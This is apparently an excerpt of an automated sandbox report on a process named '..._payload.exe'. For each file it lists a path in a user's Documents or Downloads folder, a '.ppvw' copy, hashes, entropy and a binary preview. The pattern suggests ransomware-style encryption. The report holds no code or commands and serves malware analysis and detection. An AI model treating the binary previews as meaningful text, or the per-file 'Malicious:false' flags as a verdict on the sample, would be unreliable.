                                                                                                                          Preview:KZWFN2.F.la.@>.M.U.....'x...+H.@.b....d.F....d.<F.... .ep..>.v.....<.....T.w...LA.HS..k.....q..{....d.P0W.'.f.....>0e..e..p:O.....J............;T+<...1..2P./Z...x(.,.....Y.P..:...._.P..=w...d.s....$$...~..F.zI.U[....w/R........dfd(;v.6...P.b..b...~E.....Y./o.u."...:_.........N2...`..Un8/.QC...NP.....+.0.2.6)....6...Y7.B2....]qss&..|d.0.......E...L..........g"B...M7.HV.#...A...0..A.6..)&M..3..n...fsX..C2l.|..C..y/...|.c......M..9.`.4CO...s........z.Vkfs.l$..v.../.,4I.Y5.mE....~....U..u..-.iP...yY.....]Ki. >.$L.7^.v..i... ......1k]7.V.N...Td.1{|...t6...<o...T...p..tfQ.....!.....\.Lz...,...k.i.o...V..Nk.g...+.P.*...X.~..M[$.Yqg....$....0...K.Y.&.z..6.:.:K=.....[..9".\s..%P3....T.q.L.#....K|...2P..6...JO.F.,..H.9... .K]......#........u..?.J.......,4[rK...0h.A..Q.k.Fs.Ch.].4/g..K......o5.d.6.c.pa...2...3,.~.1H...hW...P./...+>X.......9...jn..}s@..<#..M~....!..}..H.......|b.'..U.'Z.Q8.W\..8.*f=.X....p,.B.?...=....2'y..;...:....S.e.A...b..y...

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ\KZWFNRXYKI.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8504677375369845
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:pxRzHxCPfemaMy2LCQzP5xxW0A4rSpoFB8qug8yEPjKyockI9lbD:pfHxCP2maMyiCIP5xxW0A4rkoFSqug89
                                                                                                                          MD5:D6E296911A66720283DFF5138FADCEFF
                                                                                                                          SHA1:4DF766A230ACFA2138FC8EA7197185D9202ACAC5
                                                                                                                          SHA-256:9EF996E68381C150722EBACE8A3FCFFE6F4583C4F2EC1923A55454D908372E01
                                                                                                                          SHA-512:8894A5D9E50175C08A0085652B77461A8272597D0D9A2C52AC62DEA304642EBDFF5D8F562EEAFCFA7DF3DBEA5CB8537B38D78A9621FC8F33913D737ABD3662C2
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN2.F.la.@>.M.U.....'x...+H.@.b....d.F....d.<F.... .ep..>.v.....<.....T.w...LA.HS..k.....q..{....d.P0W.'.f.....>0e..e..p:O.....J............;T+<...1..2P./Z...x(.,.....Y.P..:...._.P..=w...d.s....$$...~..F.zI.U[....w/R........dfd(;v.6...P.b..b...~E.....Y./o.u."...:_.........N2...`..Un8/.QC...NP.....+.0.2.6)....6...Y7.B2....]qss&..|d.0.......E...L..........g"B...M7.HV.#...A...0..A.6..)&M..3..n...fsX..C2l.|..C..y/...|.c......M..9.`.4CO...s........z.Vkfs.l$..v.../.,4I.Y5.mE....~....U..u..-.iP...yY.....]Ki. >.$L.7^.v..i... ......1k]7.V.N...Td.1{|...t6...<o...T...p..tfQ.....!.....\.Lz...,...k.i.o...V..Nk.g...+.P.*...X.~..M[$.Yqg....$....0...K.Y.&.z..6.:.:K=.....[..9".\s..%P3....T.q.L.#....K|...2P..6...JO.F.,..H.9... .K]......#........u..?.J.......,4[rK...0h.A..Q.k.Fs.Ch.].4/g..K......o5.d.6.c.pa...2...3,.~.1H...hW...P./...+>X.......9...jn..}s@..<#..M~....!..}..H.......|b.'..U.'Z.Q8.W\..8.*f=.X....p,.B.?...=....2'y..;...:....S.e.A...b..y...

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.871113679164057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WthCON9IugFjflblb8eg0+Z60BzrB6oMkChYtoDBKH/3IG7Ve+wfUWaOK5f1Fw/g:WthCOvIuKpFtQ6mrB/MkoYCWvh7Vehcd
                                                                                                                          MD5:6A27AD58865CD5AC0846DB9AE844A565
                                                                                                                          SHA1:1F43FC9A4B8CA927CAA770156A4CBA4B4CA8432F
                                                                                                                          SHA-256:8D789B061AC0491A30C13BBE6A3C07F11E292B17E53BC018BF09DDCDD584C06E
                                                                                                                          SHA-512:C9647FD50946C835D6E1605F73F10AB398DF936B9CA806FDCA2399E4E20BB8FD44B9353B4D186A1397631490F82573E5C6037BB56314A44B1C3B3B09D6FAE8DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVCd$...e.C..|.`..Mb.c..M../....R...6..."W..6Q...j.77.. .:..eX?."...k].6.%..C=.&..\dA...'..\....h.2+.."..2.R+....xm..(...=XJ.P....-p^6\.....0.I.t.5BgS.....i..^D...O.F.K}.l...hY@!.C..1.]...J.OhhiBuj.{..Sp-...9...0..r......R......G;..I.s.,...e.o.....^......<....M!.vl.Ue;....\X.k..[Yn..P.......%.........GA.84...B.yp.W.Y}Q.M........W......wi.E..(...I.g2.....G!.........s.....O.Y...T.%...;.`..U....uH.].bK.<.....Y..@+^[M..x.k..gI3*..E...k#.z[j.f5..........1-..0r.]...OG..H$].,....E.......KI..7..}.>|...lV..m.&...... .]...#'... ..e.(~p1...U&..C..y.n7v........E.....8<...2.p....C.....DK)...\w..,......}D.../.q.....^a...JN-6...h..FqrM...Jm.<.....k...v....,e...H...L...gz..K..j.d......(..OC...%../.,..*.J...[.?.y.]-0.. ..Z5L....^...'..!.}....e7%..4...N....-..."..g..'o.w...dO+.M._.o&..n..n;z9....R7.p=..<..r&.O..Sw../ 1../.p..~...X....#.9j...z.*F.@....,<..N.O.1.AM.K..t...S.....?..|......n..".k$.f......=$v.9..:..^.........r.w...D..U....A.YA-..<.'.\

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.871113679164057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WthCON9IugFjflblb8eg0+Z60BzrB6oMkChYtoDBKH/3IG7Ve+wfUWaOK5f1Fw/g:WthCOvIuKpFtQ6mrB/MkoYCWvh7Vehcd
                                                                                                                          MD5:6A27AD58865CD5AC0846DB9AE844A565
                                                                                                                          SHA1:1F43FC9A4B8CA927CAA770156A4CBA4B4CA8432F
                                                                                                                          SHA-256:8D789B061AC0491A30C13BBE6A3C07F11E292B17E53BC018BF09DDCDD584C06E
                                                                                                                          SHA-512:C9647FD50946C835D6E1605F73F10AB398DF936B9CA806FDCA2399E4E20BB8FD44B9353B4D186A1397631490F82573E5C6037BB56314A44B1C3B3B09D6FAE8DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVCd$...e.C..|.`..Mb.c..M../....R...6..."W..6Q...j.77.. .:..eX?."...k].6.%..C=.&..\dA...'..\....h.2+.."..2.R+....xm..(...=XJ.P....-p^6\.....0.I.t.5BgS.....i..^D...O.F.K}.l...hY@!.C..1.]...J.OhhiBuj.{..Sp-...9...0..r......R......G;..I.s.,...e.o.....^......<....M!.vl.Ue;....\X.k..[Yn..P.......%.........GA.84...B.yp.W.Y}Q.M........W......wi.E..(...I.g2.....G!.........s.....O.Y...T.%...;.`..U....uH.].bK.<.....Y..@+^[M..x.k..gI3*..E...k#.z[j.f5..........1-..0r.]...OG..H$].,....E.......KI..7..}.>|...lV..m.&...... .]...#'... ..e.(~p1...U&..C..y.n7v........E.....8<...2.p....C.....DK)...\w..,......}D.../.q.....^a...JN-6...h..FqrM...Jm.<.....k...v....,e...H...L...gz..K..j.d......(..OC...%../.,..*.J...[.?.y.]-0.. ..Z5L....^...'..!.}....e7%..4...N....-..."..g..'o.w...dO+.M._.o&..n..n;z9....R7.p=..<..r&.O..Sw../ 1../.p..~...X....#.9j...z.*F.@....,<..N.O.1.AM.K..t...S.....?..|......n..".k$.f......=$v.9..:..^.........r.w...D..U....A.YA-..<.'.\

                                                                                                                          C:\Users\user\Documents\WUTJSCBCFX.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.846986485476226
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9M1TGYavmsrYTOTE86O33abvAk0hdFiX0dtvWFFKonEhSYApa4seOwFdi09hRO2D:fDvL8GhmvABFiEdtOzKoEcYSgP4di0nv
                                                                                                                          MD5:654FDF97B23315C617E16D1AA43EF433
                                                                                                                          SHA1:48E759AF9B0349A85750FF2E02618A98C600EF9C
                                                                                                                          SHA-256:FDFEAA1ACF5F70FD7E5F40E0C54A3228C1860B9112E2C58CE4CA4A0616090C0B
                                                                                                                          SHA-512:073F2E86F3F2CF06BE31297A1459EA70F0F42049D97477CF4F900ECAEFAB36CBABD0E3885F32BFF06BEC8D5A0FE1B5FD83C8B6FBBF98F0F9224A743E54D83A2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJSp.n;!bR..."9...../..7.~...o.f*b:...&...P....^}..Z...N...+a....^."...25^_.l......Q.......w!yi.J...5R.+J....s. ......P.....z.i....Y1.._....{......h.r.vTF^a.CG.&.R[zNR.F.&..9..{.*D.bI.y.D&J..x.../..9..A.......e2.X+.."..~...l.A.n.8.1G...sT.-.qkT...aF.{...)*8.96.*...V.7.g.......v.....K......1}.".N........._....Re...7.*.S.S... .P...#A.C..~.....").y...V_..f...c..zX.].s..E..].R`.'w.Ar,.8...M...B.M.W6(....:z.eQ`.v.mW....3...aF0.AA.i....A.Zr..K._(.0.....r..z..;..B...Kk....)....-...C.9h.{..7....|..n...ve<!.E...8...H......k..C...Lx~......N.;a4......".U....a0.|..X[h..y..Y.G..$b..8}...tJo(6.&.....='."D..3.A..f...bh..8Y..D-..2..Jh.mR.T.......!...M+.>kx..n...@...8.{=.F..Oc.t.*Ol.)r....e.....C.T..y.3...]...h...9.'J][u^.../.;G...`..o@.{.)._..2(.+YB.!.I.k.>.-.O.=.l..%7t.......F.....S...RP.....a.d.V.n.q.*...=..H#(..D.y...O'Y...Z.^c...Jw./....E...HO..0....v.P?..kpI..}..*...+..k8.m6.#!.d......2.h.E..x..9>K..O..|b..=.so.l.....=...)B..w..R.....+.e.$....H.

                                                                                                                          C:\Users\user\Documents\WUTJSCBCFX.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.846986485476226
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9M1TGYavmsrYTOTE86O33abvAk0hdFiX0dtvWFFKonEhSYApa4seOwFdi09hRO2D:fDvL8GhmvABFiEdtOzKoEcYSgP4di0nv
                                                                                                                          MD5:654FDF97B23315C617E16D1AA43EF433
                                                                                                                          SHA1:48E759AF9B0349A85750FF2E02618A98C600EF9C
                                                                                                                          SHA-256:FDFEAA1ACF5F70FD7E5F40E0C54A3228C1860B9112E2C58CE4CA4A0616090C0B
                                                                                                                          SHA-512:073F2E86F3F2CF06BE31297A1459EA70F0F42049D97477CF4F900ECAEFAB36CBABD0E3885F32BFF06BEC8D5A0FE1B5FD83C8B6FBBF98F0F9224A743E54D83A2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJSp.n;!bR..."9...../..7.~...o.f*b:...&...P....^}..Z...N...+a....^."...25^_.l......Q.......w!yi.J...5R.+J....s. ......P.....z.i....Y1.._....{......h.r.vTF^a.CG.&.R[zNR.F.&..9..{.*D.bI.y.D&J..x.../..9..A.......e2.X+.."..~...l.A.n.8.1G...sT.-.qkT...aF.{...)*8.96.*...V.7.g.......v.....K......1}.".N........._....Re...7.*.S.S... .P...#A.C..~.....").y...V_..f...c..zX.].s..E..].R`.'w.Ar,.8...M...B.M.W6(....:z.eQ`.v.mW....3...aF0.AA.i....A.Zr..K._(.0.....r..z..;..B...Kk....)....-...C.9h.{..7....|..n...ve<!.E...8...H......k..C...Lx~......N.;a4......".U....a0.|..X[h..y..Y.G..$b..8}...tJo(6.&.....='."D..3.A..f...bh..8Y..D-..2..Jh.mR.T.......!...M+.>kx..n...@...8.{=.F..Oc.t.*Ol.)r....e.....C.T..y.3...]...h...9.'J][u^.../.;G...`..o@.{.)._..2(.+YB.!.I.k.>.-.O.=.l..%7t.......F.....S...RP.....a.d.V.n.q.*...=..H#(..D.y...O'Y...Z.^c...Jw./....E...HO..0....v.P?..kpI..}..*...+..k8.m6.#!.d......2.h.E..x..9>K..O..|b..=.so.l.....=...)B..w..R.....+.e.$....H.

                                                                                                                          C:\Users\user\Documents\XZXHAVGRAG\HTAGVDFUIE.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836092842534886
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:5kdo5PPcz2vmXSgBvwtyMqUspNLcRiU6IWl9dYOCO4+bD:5zPP8i+ehq5rYRif4u9D
                                                                                                                          MD5:66D5B6C3C162211652E9984EEB50B5CB
                                                                                                                          SHA1:5762385C4AC9D005BBEA57B9E0675ECFB0AEA96B
                                                                                                                          SHA-256:E9593373C722F014A4F741B2DA1819DE634C166C5FA1F4E6AC894C0E48F6357A
                                                                                                                          SHA-512:F37899150E2F8B5C82D50EADA97977BC931AE5E188F88F4FA46D705BE6C949E77D08760083E3F3D196FEEF25C435D4A0985810686BC442769BAB219C582BA18D
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV.9b..[.n.......|..8.......2T..h.Q.;..-.}......-=....#7$.z.i.gv.N.t..\...C....C.P.oseyT..}W..x../\[(..g..>.H...c..\..CZ....+E'<..O..9&....1]2q...2.:.H.Q..$.......Q..F..F....c.{...x.K..&..Uo....`!../&W.R........."H..\./'.KM....g!.A..2yJ.n...j......=..N...\9..[53.v.q}....owd`.7l.7.........,.....@...%..O..C..8e.._-.<.`f..@.U.YE.....N.`.m.DF...[..2..Tq.`k3.+P<w)S.-.1.v....}...v.C.*.../.n7..l.....1.....;..X.<..<M......o.w..3..lv.....m\.R.g....p.g...i...q......I.z....=.6...iB.......`P.0+.H.i.zJ.$'%..$..n1..'....|..O.X....T.....0v~.w..t.@......^.%u..._..3.?..q.......O.....96.a....8.c.9.y...q.w49.H....l.1..\8.a.B .z...V=.r'B|..@.O5..z.+V7........5.fRH{B.k.`.E....:.pQFz...ca.........c;I...Nd.g.x.....>...98....z2..jB.Y.2.K....K#....va.6.....:.........}s.`[cyU.....d...F..IB.Xx.C<....3..S....v..w....5.g..q....w|......h...[6T.....~...H...}q.....D....0./.V.Cx`...u...5.#..S.^.j..X....K.I....O.SV..h.;.'.mV......OS..W6..5pD....2..z.....$.9...

                                                                                                                          C:\Users\user\Documents\XZXHAVGRAG\HTAGVDFUIE.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836092842534886
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:5kdo5PPcz2vmXSgBvwtyMqUspNLcRiU6IWl9dYOCO4+bD:5zPP8i+ehq5rYRif4u9D
                                                                                                                          MD5:66D5B6C3C162211652E9984EEB50B5CB
                                                                                                                          SHA1:5762385C4AC9D005BBEA57B9E0675ECFB0AEA96B
                                                                                                                          SHA-256:E9593373C722F014A4F741B2DA1819DE634C166C5FA1F4E6AC894C0E48F6357A
                                                                                                                          SHA-512:F37899150E2F8B5C82D50EADA97977BC931AE5E188F88F4FA46D705BE6C949E77D08760083E3F3D196FEEF25C435D4A0985810686BC442769BAB219C582BA18D
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV.9b..[.n.......|..8.......2T..h.Q.;..-.}......-=....#7$.z.i.gv.N.t..\...C....C.P.oseyT..}W..x../\[(..g..>.H...c..\..CZ....+E'<..O..9&....1]2q...2.:.H.Q..$.......Q..F..F....c.{...x.K..&..Uo....`!../&W.R........."H..\./'.KM....g!.A..2yJ.n...j......=..N...\9..[53.v.q}....owd`.7l.7.........,.....@...%..O..C..8e.._-.<.`f..@.U.YE.....N.`.m.DF...[..2..Tq.`k3.+P<w)S.-.1.v....}...v.C.*.../.n7..l.....1.....;..X.<..<M......o.w..3..lv.....m\.R.g....p.g...i...q......I.z....=.6...iB.......`P.0+.H.i.zJ.$'%..$..n1..'....|..O.X....T.....0v~.w..t.@......^.%u..._..3.?..q.......O.....96.a....8.c.9.y...q.w49.H....l.1..\8.a.B .z...V=.r'B|..@.O5..z.+V7........5.fRH{B.k.`.E....:.pQFz...ca.........c;I...Nd.g.x.....>...98....z2..jB.Y.2.K....K#....va.6.....:.........}s.`[cyU.....d...F..IB.Xx.C<....3..S....v..w....5.g..q....w|......h...[6T.....~...H...}q.....D....0./.V.Cx`...u...5.#..S.^.j..X....K.I....O.SV..h.;.'.mV......OS..W6..5pD....2..z.....$.9...

                                                                                                                          C:\Users\user\Documents\XZXHAVGRAG\ONBQCLYSPU.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851331052640129
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:PCtl33e90D4LdTjvNeDF++YBkdlBslZxcxSRkXP8L+Ta5yd6q/JbD:g33e9imTTkB++YalqDVRsw+OAdj/pD
                                                                                                                          MD5:947F55816BEA69A07E57EBC13F931BBD
                                                                                                                          SHA1:EF1E65327673E75E4AB28A8A464691C4FD441F4B
                                                                                                                          SHA-256:D7797EAEFE44BFE246B28D40B87AD931FFB8521B4525C269A8B9E0EB90CE108F
                                                                                                                          SHA-512:3EDE40B43D4C09330667EEC4C1F6EC1EAD9DEA199A32CB6709DFAB6FEC15A77AEF1DA9D5AE3F30D60AEECC18EDF6D4147CB2823170E440A6CCEFF4F85BCC02FF
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQC.[.z.....x...nF....>-.&.t..O........d ......!..%+L....P.. Y<....c.t..o...XX...'{.....".Z..m.s"8...r.M&_`.....%6D..C....(y...&......b..Y5.<Ql......<./.....).m.C...F+.&.7.c...M.y<...r...gp...E>.N.OQn.Y.v.e..VhQS5|....;7.;?.q#4..-'...0..B).0r..Q....E.n.M..u....Zr.I..1!.g>.HA...R....,...B.O.*._.....w..<....iB...6....>.......'...7.be2.x..-.....2)..A+..h...J..GK..A..'yn.K...1.I......FPx...;..{!...._;...9,.K...HG:.W.(..T...........B..IC..K.FA..._..jli.ur~.:....9+.......).p....c..N.(.|.....?..i.ND...8...3..\.g. ..$Ak.........?y.7H.P...._H....2..P.5...Z....C#..T....ph]G....,.6fV.).|.......C<f........^..DUm.@.A..,.Z).Y....5.@.5I.j..$...aj.J......'m..QcG.k..4U./M.\.|<]<....z.L...j. .K.../.`H:.P..H...w.1.v.:R.!..D....!. C({-...O...F....h..bq...W.Xo'...=.$.E.@yC.3<.E.]..!...&.h.GD..l5.....s......Y.m.../...(...d..&.i.R.Ky...<>x....,....*......Q.`cr....f.M*..z.yd.%......\...B%.g3..J.Z6...W.op../1..&,U.{P1f..5&...E...<.oJ.n..Z.P........H..H...g

                                                                                                                          C:\Users\user\Documents\XZXHAVGRAG\ONBQCLYSPU.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851331052640129
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:PCtl33e90D4LdTjvNeDF++YBkdlBslZxcxSRkXP8L+Ta5yd6q/JbD:g33e9imTTkB++YalqDVRsw+OAdj/pD
                                                                                                                          MD5:947F55816BEA69A07E57EBC13F931BBD
                                                                                                                          SHA1:EF1E65327673E75E4AB28A8A464691C4FD441F4B
                                                                                                                          SHA-256:D7797EAEFE44BFE246B28D40B87AD931FFB8521B4525C269A8B9E0EB90CE108F
                                                                                                                          SHA-512:3EDE40B43D4C09330667EEC4C1F6EC1EAD9DEA199A32CB6709DFAB6FEC15A77AEF1DA9D5AE3F30D60AEECC18EDF6D4147CB2823170E440A6CCEFF4F85BCC02FF
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQC.[.z.....x...nF....>-.&.t..O........d ......!..%+L....P.. Y<....c.t..o...XX...'{.....".Z..m.s"8...r.M&_`.....%6D..C....(y...&......b..Y5.<Ql......<./.....).m.C...F+.&.7.c...M.y<...r...gp...E>.N.OQn.Y.v.e..VhQS5|....;7.;?.q#4..-'...0..B).0r..Q....E.n.M..u....Zr.I..1!.g>.HA...R....,...B.O.*._.....w..<....iB...6....>.......'...7.be2.x..-.....2)..A+..h...J..GK..A..'yn.K...1.I......FPx...;..{!...._;...9,.K...HG:.W.(..T...........B..IC..K.FA..._..jli.ur~.:....9+.......).p....c..N.(.|.....?..i.ND...8...3..\.g. ..$Ak.........?y.7H.P...._H....2..P.5...Z....C#..T....ph]G....,.6fV.).|.......C<f........^..DUm.@.A..,.Z).Y....5.@.5I.j..$...aj.J......'m..QcG.k..4U./M.\.|<]<....z.L...j. .K.../.`H:.P..H...w.1.v.:R.!..D....!. C({-...O...F....h..bq...W.Xo'...=.$.E.@yC.3<.E.]..!...&.h.GD..l5.....s......Y.m.../...(...d..&.i.R.Ky...<>x....,....*......Q.`cr....f.M*..z.yd.%......\...B%.g3..J.Z6...W.op../1..&,U.{P1f..5&...E...<.oJ.n..Z.P........H..H...g

                                                                                                                          C:\Users\user\Documents\XZXHAVGRAG\VLZDGUKUTZ.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863704422443249
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FnFWgV8Q/vFnD9L3rs/tHRAP0JlORJrgmEKYurjm2eUIEC6qkbD:dCknRL3rmAP0JQrgmvYuXeUt3D
                                                                                                                          MD5:B4265217DB7CB460EC1E1B05E9A0160B
                                                                                                                          SHA1:BBFB6BD5FF54A3FD10571A331D8C8F4E6C88A19A
                                                                                                                          SHA-256:C6C10C695B3214502967D60767B2C0CF3150EC97CB763B40CE0BBA86B05F7CA4
                                                                                                                          SHA-512:682A717FEE361F5295ED4A3268C8BB422EDF111382A32CE3276A1251E9D45DB713B8D36D9BE389AB24F7D99BDCCF4D421DAD5EE82DC318C37D97625329A4ACAC
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.gp.!).8A......C.........S..?4+....J.)...k.H..^..E7BY..D{..b..n .W..L.8[m.A..$...u.K.........a.Q........2b..NS4..D.s._....~L..hP....r....2S-.{k....'..jI..Q.t.~..(...r..+Y.&....1.U..u6..aI......Nc....h. .[.X....6.S........=..N.b.<2...m...C......e.m....4..*..`B/9m./r..\..B..d.W...o.7.r?.`KU. ...ty..;.L......)L.A.[..Q3..-..oS.Wx.....,0sR.2R........`Y=/...h.....q.v.....(...`q...G..0.U.c3.w.......G.I...3Q..jWA..q...R......>.......sF.Sd'`x.S......c...q.}.Tx.Cd=.Z..5........,Wf|.o..[...U....V..l......]T.'. r..{#.5..../..y..;.0{........"..%..0..~7.....aL]....W<!....v.....O..1...z.cn..C.W..1n..+.]x..Q..>....f.E..T5....DxE[...(..`.$.cl....A."...X....T. .J.m6.3u{..*..:\.0..6.r^...D.x].7..........-.8...`.'D....Ck..z...r.L....B.......E...y9rA.......}....1..)....k'.+..X...)s.......`x..ns...............I.Rb...5....a.wj.=..X..../=b`...o...0&.Q.B..^......0.....G..K...'..N...R..$.v,.mw......Q....|...i..j...i...........|.._4......{..l...oF.<......$

                                                                                                                          C:\Users\user\Documents\XZXHAVGRAG\VLZDGUKUTZ.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863704422443249
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FnFWgV8Q/vFnD9L3rs/tHRAP0JlORJrgmEKYurjm2eUIEC6qkbD:dCknRL3rmAP0JQrgmvYuXeUt3D
                                                                                                                          MD5:B4265217DB7CB460EC1E1B05E9A0160B
                                                                                                                          SHA1:BBFB6BD5FF54A3FD10571A331D8C8F4E6C88A19A
                                                                                                                          SHA-256:C6C10C695B3214502967D60767B2C0CF3150EC97CB763B40CE0BBA86B05F7CA4
                                                                                                                          SHA-512:682A717FEE361F5295ED4A3268C8BB422EDF111382A32CE3276A1251E9D45DB713B8D36D9BE389AB24F7D99BDCCF4D421DAD5EE82DC318C37D97625329A4ACAC
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.gp.!).8A......C.........S..?4+....J.)...k.H..^..E7BY..D{..b..n .W..L.8[m.A..$...u.K.........a.Q........2b..NS4..D.s._....~L..hP....r....2S-.{k....'..jI..Q.t.~..(...r..+Y.&....1.U..u6..aI......Nc....h. .[.X....6.S........=..N.b.<2...m...C......e.m....4..*..`B/9m./r..\..B..d.W...o.7.r?.`KU. ...ty..;.L......)L.A.[..Q3..-..oS.Wx.....,0sR.2R........`Y=/...h.....q.v.....(...`q...G..0.U.c3.w.......G.I...3Q..jWA..q...R......>.......sF.Sd'`x.S......c...q.}.Tx.Cd=.Z..5........,Wf|.o..[...U....V..l......]T.'. r..{#.5..../..y..;.0{........"..%..0..~7.....aL]....W<!....v.....O..1...z.cn..C.W..1n..+.]x..Q..>....f.E..T5....DxE[...(..`.$.cl....A."...X....T. .J.m6.3u{..*..:\.0..6.r^...D.x].7..........-.8...`.'D....Ck..z...r.L....B.......E...y9rA.......}....1..)....k'.+..X...)s.......`x..ns...............I.Rb...5....a.wj.=..X..../=b`...o...0&.Q.B..^......0.....G..K...'..N...R..$.v,.mw......Q....|...i..j...i...........|.._4......{..l...oF.<......$

                                                                                                                          C:\Users\user\Downloads\FENIVHOIKN.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8309223854615615
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:F383efk3QoIJuSzdUVWcDdpAp/0Hw/VDzSrSTF1XJ791a4GOuDGbD:F3+efhxMdpAp8Hw9XSrgX93AVUD
                                                                                                                          MD5:AA718766E0E11F1F1AFD30683D2B652E
                                                                                                                          SHA1:B5F84199CC4621FA4918C0DF992003D41803E70A
                                                                                                                          SHA-256:851AF6DE7C3D550C785C79CE22839903266E9172A5F948ED6497FB51E6D06680
                                                                                                                          SHA-512:05882EEFE558AD6BB273D0A633CDD6BAF42E46ED28CBF33AE52670CBA89EDB3AD1964A1077F4FE2B471EA02CE75341B6861E26C3A3C7D8F1C480BE2916B3C97C
                                                                                                                          Malicious:false
